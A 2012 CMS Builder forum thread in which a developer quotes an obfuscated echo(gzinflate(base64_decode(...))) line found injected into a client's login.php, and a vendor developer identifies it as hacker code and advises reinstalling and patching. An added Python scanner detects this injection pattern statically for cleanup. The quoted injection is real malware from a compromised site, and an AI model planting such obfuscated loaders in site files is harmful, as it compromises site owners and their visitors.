Issue with Login
2 posts by 2 authors in: Forums > CMS Builder
Last Post: March 15, 2012
By KCMedia - March 15, 2012
Hi
I had 2 clients email me today saying that they couldn't log in to their CMSB installs. These are the errors they were displaying:
Parse error: syntax error, unexpected T_ECHO in /home/abbasbac/public_html/cmsAdmin/lib/menus/login.php on line 3
So I looked at the login.php file and I found this funny code at the top of the page. What do you think about this?
I also found the same line of code in some other files.
<?php include "header.php"
#b58b6f#
echo(gzinflate(base64_decode("JcvBDYAgDADAVUgHoH8D7NJgVVCEtNXo9j78XnJBs5Rhzt7BEYwfw0o3/QpOJUfYzMaE2GWls+Sl97mR7Gzqc2+eLhQ+mJR9VUgB/5s+")));
#/b58b6f#
?>
Thanks
Craig
KC Media Solutions
www.kcmedia.biz
Re: [kcmedia] Issue with Login
By Dave - March 15, 2012
Hi Craig,
That looks like some malicious hacker code.
I would recommend either re-uploading the CMSB files or upgrading CMSB - either will replace the files with known good copies. Then check over any other PHP files on your website for vulnerabilities.
We've seen this a number of times and CMSB is never the entry point. Typically hackers get in by using automated scanners that look for security exploits in old versions of common open source software like WordPress, email forms, gallery scripts, etc. If you have anything like that, check the versions and upgrade if needed, or just remove them if the software isn't needed anymore.
Also: Can you zip up that file and send it to me? I'm working on an automated security scanner for a future version of CMSB.
Let me know if you have any questions.
Dave Edis - Senior Developer
interactivetools.com
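Added example, not part of either post and not CMSB's own scanner: a static check for the injection shape shown in the first post (a paired `#b58b6f#` ... `#/b58b6f#` comment marker around an `echo(gzinflate(base64_decode(...)))` chain), which inflates the blob for review without executing any PHP. It assumes the marker is always a six-hex-digit tag (the thread shows only one), and the function names and the sample file with its harmless payload are constructed for illustration.

```python
import base64
import re
import zlib

# Paired marker comments such as "#b58b6f# ... #/b58b6f#" (six hex digits is an assumption).
MARKER_RE = re.compile(r"#([0-9a-f]{6})#(.*?)#/\1#", re.S)
# The echo/eval(gzinflate(base64_decode("..."))) decoder chain from the post.
CHAIN_RE = re.compile(
    r"\b(?:echo|eval)\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*[\"']([A-Za-z0-9+/=]+)[\"']",
    re.I)


def inflate_static(blob):
    """Decode base64 + raw DEFLATE (the format PHP's gzinflate reads); never runs PHP."""
    try:
        raw = base64.b64decode(blob, validate=True)
        return zlib.decompress(raw, -zlib.MAX_WBITS).decode("utf-8", "replace")
    except (ValueError, zlib.error):
        return None  # truncated or otherwise undecodable blob: flag it, decode by hand


def scan_php(source):
    """Return one finding per marker-wrapped block and per bare decoder chain."""
    findings, covered = [], []
    for m in MARKER_RE.finditer(source):
        chain = CHAIN_RE.search(m.group(2))
        covered.append(m.span())
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "marker": m.group(1),
            "decoded": inflate_static(chain.group(1)) if chain else None,
        })
    for c in CHAIN_RE.finditer(source):
        if not any(a <= c.start() < b for a, b in covered):
            findings.append({
                "line": source.count("\n", 0, c.start()) + 1,
                "marker": None,
                "decoded": inflate_static(c.group(1)),
            })
    return findings


def make_sample(text):
    """Constructed sample: a file infected in the same shape as the post, benign payload."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    blob = base64.b64encode(comp.compress(text.encode()) + comp.flush()).decode()
    return ('<?php include "header.php"\n#b58b6f#\n'
            'echo(gzinflate(base64_decode("' + blob + '")));\n#/b58b6f#\n?>\n')
```

Run `scan_php` over the contents of every `.php` file under the web root; any finding means the file should be replaced from a known good copy, as recommended in the reply above.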